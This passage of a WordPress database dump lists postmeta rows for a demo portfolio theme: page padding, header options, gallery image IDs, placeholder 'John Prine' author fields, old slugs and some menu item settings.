0'),(46488,2646,'mkdf_disable_vertical_header_background_image_meta','no'),(46489,2646,'mkdf_disable_header_widget_areas_meta','no'),(46490,2646,'mkdf_title_area_type_meta','attika'),(46491,2646,'_dp_original','2457'),(46492,2652,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46493,2652,'_wp_page_template','default'),(46494,2652,'slide_template','default'),(46495,2652,'_wpb_vc_js_status','true'),(46496,2652,'mkdf_page_content_behind_header_meta','no'),(46497,2652,'mkdf_disable_vertical_header_background_image_meta','no'),(46498,2652,'mkdf_disable_header_widget_areas_meta','no'),(46499,2652,'mkdf_disable_header_meta','yes'),(46500,2652,'mkdf_show_title_area_meta','no'),(46501,2652,'mkdf_disable_footer_meta','yes'),(46502,2652,'mkdf_page_content_padding','0'),(46503,3075,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46504,3075,'_thumbnail_id','121'),(46505,3075,'mkdf_page_content_behind_header_meta','no'),(46506,3075,'mkdf_page_content_padding','115px 0 100px 0'),(46507,3075,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46508,3075,'portfolio_single_back_to_link','81'),(46509,3075,'mkdf_disable_vertical_header_background_image_meta','no'),(46510,3075,'mkdf_disable_header_widget_areas_meta','no'),(46511,3075,'slide_template','default'),(46512,3075,'_wpb_vc_js_status','false'),(46513,3075,'mkdf-portfolio-image-gallery','1903,1902,1901'),(46514,3075,'mkdf_portfolio_single_template_meta','images'),(46515,3075,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46516,3075,'_wp_old_slug','h1-1'),(46517,3076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46518,3076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46519,3076,'_thumbnail_id','137'),(46520,3076,'mkdf_page_content_behind_header_meta','no'),(46521,3076,'mkdf_page_content_padding','115px 0 100px 0'),(46522,3076,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46523,3076,'portfolio_single_back_to_link','81'),(46524,3076,'mkdf_disable_vertical_header_background_image_meta','no'),(46525,3076,'mkdf_disable_header_widget_areas_meta','no'),(46526,3076,'slide_template','default'),(46527,3076,'_wpb_vc_js_status','true'),(46528,3076,'_dp_original','104'),(46529,3076,'mkdf-portfolio-image-gallery','567,566,565'),(46530,3076,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46531,3076,'mkdf_portfolio_single_template_meta','small-images'),(46532,3076,'_wp_old_slug','h1-2'),(46533,3077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46534,3077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46535,3077,'_thumbnail_id','138'),(46536,3077,'mkdf_page_content_behind_header_meta','no'),(46537,3077,'mkdf_page_content_padding','115px 0 100px 0'),(46538,3077,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46539,3077,'portfolio_single_back_to_link','81'),(46540,3077,'mkdf_disable_vertical_header_background_image_meta','no'),(46541,3077,'mkdf_disable_header_widget_areas_meta','no'),(46542,3077,'slide_template','default'),(46543,3077,'_wpb_vc_js_status','true'),(46544,3077,'_dp_original','104'),(46545,3077,'mkdf-portfolio-image-gallery','1901,1902,1903'),(46546,3077,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46547,3077,'mkdf_portfolio_single_template_meta','slider'),(46548,3077,'_wp_old_slug','h1-3'),(46549,3077,'_wp_old_slug','homemade-dining'),(46550,3078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46551,3078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46552,3078,'_thumbnail_id','571'),(46553,3078,'mkdf_page_content_behind_header_meta','no'),(46554,3078,'mkdf_page_content_padding','115px 0 100px 0'),(46555,3078,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46556,3078,'portfolio_single_back_to_link','569'),(46557,3078,'mkdf_disable_vertical_header_background_image_meta','no'),(46558,3078,'mkdf_disable_header_widget_areas_meta','no'),(46559,3078,'slide_template','default'),(46560,3078,'_wpb_vc_js_status','true'),(46561,3078,'mkdf-portfolio-image-gallery','565,566,567'),(46562,3078,'mkdf_portfolio_single_template_meta','small-slider'),(46563,3078,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46564,3078,'_dp_original','104'),(46565,3078,'_wp_old_slug','h8-1'),(46566,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46567,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46568,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46569,3079,'mkdf_page_content_behind_header_meta','no'),(46570,3079,'mkdf_page_content_padding','115px 0 100px 0'),(46571,3079,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46572,3079,'portfolio_single_back_to_link','569'),(46573,3079,'mkdf_disable_vertical_header_background_image_meta','no'),(46574,3079,'mkdf_disable_header_widget_areas_meta','no'),(46575,3079,'slide_template','default'),(46576,3079,'_wpb_vc_js_status','true'),(46577,3079,'mkdf-portfolio-image-gallery','567,566,565'),(46578,3079,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46579,3079,'mkdf_portfolio_single_template_meta','gallery'),(46580,3079,'_dp_original','136'),(52090,4353,'_menu_item_icon','null'),(46582,3079,'_wp_old_slug','h8-2'),(46583,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46584,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46585,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46586,3080,'_thumbnail_id','584'),(46587,3080,'mkdf_page_content_behind_header_meta','no'),(46588,3080,'mkdf_page_content_padding','115px 0 100px 0'),(46589,3080,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46590,3080,'portfolio_single_back_to_link','569'),(46591,3080,'mkdf_disable_vertical_header_background_image_meta','no'),(46592,3080,'mkdf_disable_header_widget_areas_meta','no'),(46593,3080,'slide_template','default'),(46594,3080,'_wpb_vc_js_status','true'),(46595,3080,'mkdf-portfolio-image-gallery','567,566,565'),(46596,3080,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46597,3080,'mkdf_portfolio_single_template_meta','small-images'),(46598,3080,'_dp_original','141'),(46599,3080,'_wp_old_slug','h8-3'),(46600,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46601,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46602,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46603,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46604,3081,'_thumbnail_id','589'),(46605,3081,'mkdf_page_content_behind_header_meta','no'),(46606,3081,'mkdf_page_content_padding','115px 0 100px 0'),(46607,3081,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46608,3081,'portfolio_single_back_to_link','569'),(46609,3081,'mkdf_disable_vertical_header_background_image_meta','no'),(46610,3081,'mkdf_disable_header_widget_areas_meta','no'),(46611,3081,'slide_template','default'),(46612,3081,'_wpb_vc_js_status','true'),(46613,3081,'mkdf-portfolio-image-gallery','567,566,565'),(46614,3081,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46615,3081,'mkdf_portfolio_single_template_meta','masonry'),(46616,3081,'_dp_original','583'),(46617,3081,'_wp_old_slug','h8-4'),(46618,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46619,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46620,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46621,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46622,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46623,3082,'_thumbnail_id','591'),(46624,3082,'mkdf_page_content_behind_header_meta','no'),(46625,3082,'mkdf_page_content_padding','115px 0 100px 0'),(46626,3082,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46627,3082,'portfolio_single_back_to_link','569'),(46628,3082,'mkdf_disable_vertical_header_background_image_meta','no'),(46629,3082,'mkdf_disable_header_widget_areas_meta','no'),(46630,3082,'slide_template','default'),(46631,3082,'_wpb_vc_js_status','true'),(46632,3082,'mkdf-portfolio-image-gallery','567,566,565'),(46633,3082,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46634,3082,'mkdf_portfolio_single_template_meta','slider'),(46635,3082,'_dp_original','588'),(46636,3082,'_wp_old_slug','h8-5'),(46637,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46638,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46639,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46640,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46641,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46642,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46643,3083,'mkdf_page_content_behind_header_meta','no'),(46644,3083,'mkdf_page_content_padding','115px 0 100px 0'),(46645,3083,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46646,3083,'portfolio_single_back_to_link','569'),(46647,3083,'mkdf_disable_vertical_header_background_image_meta','no'),(46648,3083,'mkdf_disable_header_widget_areas_meta','no'),(46649,3083,'slide_template','default'),(46650,3083,'_wpb_vc_js_status','true'),(46651,3083,'mkdf-portfolio-image-gallery','567,566,565'),(46652,3083,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46653,3083,'mkdf_portfolio_single_template_meta','small-slider'),(46654,3083,'_dp_original','590'),(46655,3083,'_thumbnail_id','594'),(46656,3083,'_wp_old_slug','h8-6'),(46657,618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46658,618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46659,618,'mkdf_page_content_behind_header_meta','no'),(46660,618,'mkdf_page_content_padding','115px 0 100px 0'),(46661,618,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46662,618,'portfolio_single_back_to_link','610'),(46663,618,'mkdf_disable_vertical_header_background_image_meta','no'),(46664,618,'mkdf_disable_header_widget_areas_meta','no'),(46665,618,'slide_template','default'),(46666,618,'_wpb_vc_js_status','false'),(46667,618,'mkdf-portfolio-image-gallery','565,566,567'),(46668,618,'mkdf_portfolio_single_template_meta','images'),(46669,618,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46670,618,'_dp_original','104'),(46671,618,'_thumbnail_id','1095'),(46672,618,'_wp_old_slug','h6-1'),(46673,618,'_wp_old_slug','cold-raspberry-soup'),(46674,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46675,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46676,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46677,3084,'mkdf_page_content_behind_header_meta','no'),(46678,3084,'mkdf_page_content_padding','115px 0 100px 0'),(46679,3084,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46680,3084,'portfolio_single_back_to_link','610'),(46681,3084,'mkdf_disable_vertical_header_background_image_meta','no'),(46682,3084,'mkdf_disable_header_widget_areas_meta','no'),(46683,3084,'slide_template','default'),(46684,3084,'_wpb_vc_js_status','true'),(46685,3084,'mkdf-portfolio-image-gallery','567,566,565'),(46686,3084,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46687,3084,'mkdf_portfolio_single_template_meta','small-images'),(46688,3084,'_dp_original','136'),(46689,3084,'_thumbnail_id','1096'),(46690,3084,'_wp_old_slug','h6-2'),(46691,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46692,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46693,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46694,3085,'mkdf_page_content_behind_header_meta','no'),(46695,3085,'mkdf_page_content_padding','115px 0 100px 0'),(46696,3085,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46697,3085,'portfolio_single_back_to_link','610'),(46698,3085,'mkdf_disable_vertical_header_background_image_meta','no'),(46699,3085,'mkdf_disable_header_widget_areas_meta','no'),(46700,3085,'slide_template','default'),(46701,3085,'_wpb_vc_js_status','true'),(46702,3085,'mkdf-portfolio-image-gallery','567,566,565'),(46703,3085,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46704,3085,'mkdf_portfolio_single_template_meta','slider'),(46705,3085,'_dp_original','141'),(46706,3085,'_thumbnail_id','1098'),(46707,3085,'_wp_old_slug','h6-3'),(46708,3085,'_wp_old_slug','that-croissant'),(46709,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46710,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46711,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46712,3086,'mkdf_page_content_behind_header_meta','no'),(46713,3086,'mkdf_page_content_padding','115px 0 100px 0'),(46714,3086,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46715,3086,'portfolio_single_back_to_link','610'),(46716,3086,'mkdf_disable_vertical_header_background_image_meta','no'),(46717,3086,'mkdf_disable_header_widget_areas_meta','no'),(46718,3086,'slide_template','default'),(46719,3086,'_wpb_vc_js_status','true'),(46720,3086,'mkdf-portfolio-image-gallery','565,566,567'),(46721,3086,'mkdf_portfolio_single_template_meta','small-slider'),(46722,3086,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46723,3086,'_dp_original','568'),(46724,3086,'_thumbnail_id','1097'),(46725,3086,'_wp_old_slug','h6-4'),(46726,3086,'_wp_old_slug','cream-soup'),(46727,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46728,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46729,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46730,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46731,3087,'mkdf_page_content_behind_header_meta','no'),(46732,3087,'mkdf_page_content_padding','115px 0 100px 0'),(46733,3087,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46734,3087,'portfolio_single_back_to_link','610'),(46735,3087,'mkdf_disable_vertical_header_background_image_meta','no'),(46736,3087,'mkdf_disable_header_widget_areas_meta','no'),(46737,3087,'slide_template','default'),(46738,3087,'_wpb_vc_js_status','true'),(46739,3087,'mkdf-portfolio-image-gallery','567,566,565'),(46740,3087,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46741,3087,'mkdf_portfolio_single_template_meta','gallery'),(46742,3087,'_dp_original','580'),(46743,3087,'_thumbnail_id','1099'),(46744,3087,'_wp_old_slug','h6-5'),(46745,3088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46746,3088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46747,3088,'mkdf_page_content_behind_header_meta','no'),(46748,3088,'mkdf_page_content_padding','115px 0 100px 0'),(46749,3088,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46750,3088,'portfolio_single_back_to_link','610'),(46751,3088,'mkdf_disable_vertical_header_background_image_meta','no'),(46752,3088,'mkdf_disable_header_widget_areas_meta','no'),(46753,3088,'slide_template','default'),(46754,3088,'_wpb_vc_js_status','false'),(46755,3088,'mkdf-portfolio-image-gallery','565,566,567'),(46756,3088,'mkdf_portfolio_single_template_meta','images'),(46757,3088,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46758,3088,'_dp_original','104'),(46759,3088,'_thumbnail_id','1101'),(46760,3088,'_wp_old_slug','h6-7'),(46761,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46762,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46763,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46764,3089,'mkdf_page_content_behind_header_meta','no'),(46765,3089,'mkdf_page_content_padding','115px 0 100px 0'),(46766,3089,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46767,3089,'portfolio_single_back_to_link','610'),(46768,3089,'mkdf_disable_vertical_header_background_image_meta','no'),(46769,3089,'mkdf_disable_header_widget_areas_meta','no'),(46770,3089,'slide_template','default'),(46771,3089,'_wpb_vc_js_status','true'),(46772,3089,'mkdf-portfolio-image-gallery','567,566,565'),(46773,3089,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46774,3089,'mkdf_portfolio_single_template_meta','small-images'),(46775,3089,'_dp_original','136'),(46776,3089,'_thumbnail_id','1121'),(46777,3089,'_wp_old_slug','h6-6'),(46778,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46779,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46780,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46781,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46782,3090,'mkdf_page_content_behind_header_meta','no'),(46783,3090,'mkdf_page_content_padding','115px 0 100px 0'),(46784,3090,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46785,3090,'portfolio_single_back_to_link','610'),(46786,3090,'mkdf_disable_vertical_header_background_image_meta','no'),(46787,3090,'mkdf_disable_header_widget_areas_meta','no'),(46788,3090,'slide_template','default'),(46789,3090,'_wpb_vc_js_status','true'),(46790,3090,'mkdf-portfolio-image-gallery','567,566,565'),(46791,3090,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46792,3090,'mkdf_portfolio_single_template_meta','small-images'),(46793,3090,'_dp_original','649'),(46794,3090,'_thumbnail_id','1102'),(46795,3090,'_wp_old_slug','h6-8'),(46796,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46797,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46798,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46799,3091,'mkdf_page_content_behind_header_meta','no'),(46800,3091,'mkdf_page_content_padding','115px 0 100px 0'),(46801,3091,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46802,3091,'portfolio_single_back_to_link','610'),(46803,3091,'mkdf_disable_vertical_header_background_image_meta','no'),(46804,3091,'mkdf_disable_header_widget_areas_meta','no'),(46805,3091,'slide_template','default'),(46806,3091,'_wpb_vc_js_status','false'),(46807,3091,'mkdf-portfolio-image-gallery','565,566,567'),(46808,3091,'mkdf_portfolio_single_template_meta','images'),(46809,3091,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46810,3091,'_dp_original','648'),(46811,3091,'_thumbnail_id','1103'),(46812,3091,'_wp_old_slug','h6-9'),(46813,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46814,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46815,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46816,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46817,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46818,2843,'_wp_page_template','full-width.php'),(46819,2843,'slide_template','default'),(46820,2843,'_wpb_vc_js_status','true'),(46821,2843,'mkdf_page_content_behind_header_meta','no'),(46822,2843,'mkdf_page_content_padding','30px 30px 50px 30px'),(46823,2843,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(46824,2843,'mkdf_disable_vertical_header_background_image_meta','no'),(46825,2843,'mkdf_disable_header_widget_areas_meta','no'),(46826,2843,'mkdf_title_area_type_meta','attika'),(46827,2843,'_dp_original','1192'),(46828,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46829,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46830,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46831,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46832,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46833,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46834,2857,'_wp_page_template','full-width.php'),(46835,2857,'slide_template','default'),(46836,2857,'_wpb_vc_js_status','true'),(46837,2857,'mkdf_page_content_behind_header_meta','no'),(46838,2857,'mkdf_page_content_padding','30px 30px 50px 30px'),(46839,2857,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(46840,2857,'mkdf_disable_vertical_header_background_image_meta','no'),(46841,2857,'mkdf_disable_header_widget_areas_meta','no'),(46842,2857,'mkdf_title_area_type_meta','attika'),(46843,2857,'_dp_original','2843'),(46844,3092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46845,3092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52274,4373,'_menu_item_menu_item_parent','4357'),(46847,3092,'mkdf_page_content_behind_header_meta','no'),(46848,3092,'mkdf_page_content_padding','115px 0 100px 0'),(46849,3092,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46850,3092,'portfolio_single_back_to_link','664'),(46851,3092,'mkdf_disable_vertical_header_background_image_meta','no'),(46852,3092,'mkdf_disable_header_widget_areas_meta','no'),(46853,3092,'slide_template','default'),(46854,3092,'_wpb_vc_js_status','false'),(46855,3092,'mkdf-portfolio-image-gallery','565,566,567'),(46856,3092,'mkdf_portfolio_single_template_meta','images'),(46857,3092,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46858,3092,'_dp_original','104'),(46859,3092,'_wp_old_slug','h4-1'),(46860,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46861,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46862,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52272,4372,'_menu_item_icon','null'),(46864,3093,'mkdf_page_content_behind_header_meta','no'),(46865,3093,'mkdf_page_content_padding','115px 0 100px 0'),(46866,3093,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46867,3093,'portfolio_single_back_to_link','664'),(46868,3093,'mkdf_disable_vertical_header_background_image_meta','no'),(46869,3093,'mkdf_disable_header_widget_areas_meta','no'),(46870,3093,'slide_template','default'),(46871,3093,'_wpb_vc_js_status','true'),(46872,3093,'mkdf-portfolio-image-gallery','567,566,565'),(46873,3093,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46874,3093,'mkdf_portfolio_single_template_meta','small-images'),(46875,3093,'_dp_original','136'),(46876,3093,'_wp_old_slug','h4-2'),(46877,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46878,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46879,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52280,4373,'_menu_item_url','#'),(46881,3094,'mkdf_page_content_behind_header_meta','no'),(46882,3094,'mkdf_page_content_padding','115px 0 100px 0'),(46883,3094,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46884,3094,'portfolio_single_back_to_link','664'),(46885,3094,'mkdf_disable_vertical_header_background_image_meta','no'),(46886,3094,'mkdf_disable_header_widget_areas_meta','no'),(46887,3094,'slide_template','default'),(46888,3094,'_wpb_vc_js_status','true'),(46889,3094,'mkdf-portfolio-image-gallery','567,566,565'),(46890,3094,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46891,3094,'mkdf_portfolio_single_template_meta','slider'),(46892,3094,'_dp_original','141'),(46893,3094,'_wp_old_slug','h4-3'),(46894,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46895,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46896,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46897,3095,'_thumbnail_id','1059'),(46898,3095,'mkdf_page_content_behind_header_meta','no'),(46899,3095,'mkdf_page_content_padding','115px 0 100px 0'),(46900,3095,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46901,3095,'portfolio_single_back_to_link','84'),(46902,3095,'mkdf_disable_vertical_header_background_image_meta','no'),(46903,3095,'mkdf_disable_header_widget_areas_meta','no'),(46904,3095,'slide_template','default'),(46905,3095,'_wpb_vc_js_status','true'),(46906,3095,'mkdf-portfolio-image-gallery','567,566,565'),(46907,3095,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46908,3095,'mkdf_portfolio_single_template_meta','small-images'),(46909,3095,'_dp_original','136'),(46910,3095,'_wp_old_slug','h1-2-2'),(46911,3095,'_wp_old_slug','h2-1'),(46912,3095,'_wp_old_slug','h2-4'),(46913,3095,'_wp_old_slug','kakalamba-appetizer'),(46914,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46915,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46916,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46917,3096,'_thumbnail_id','1058'),(46918,3096,'mkdf_page_content_behind_header_meta','no'),(46919,3096,'mkdf_page_content_padding','115px 0 100px 0'),(46920,3096,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46921,3096,'portfolio_single_back_to_link','84'),(46922,3096,'mkdf_disable_vertical_header_background_image_meta','no'),(46923,3096,'mkdf_disable_header_widget_areas_meta','no'),(46924,3096,'slide_template','default'),(46925,3096,'_wpb_vc_js_status','true'),(46926,3096,'mkdf-portfolio-image-gallery','567,566,565'),(46927,3096,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John 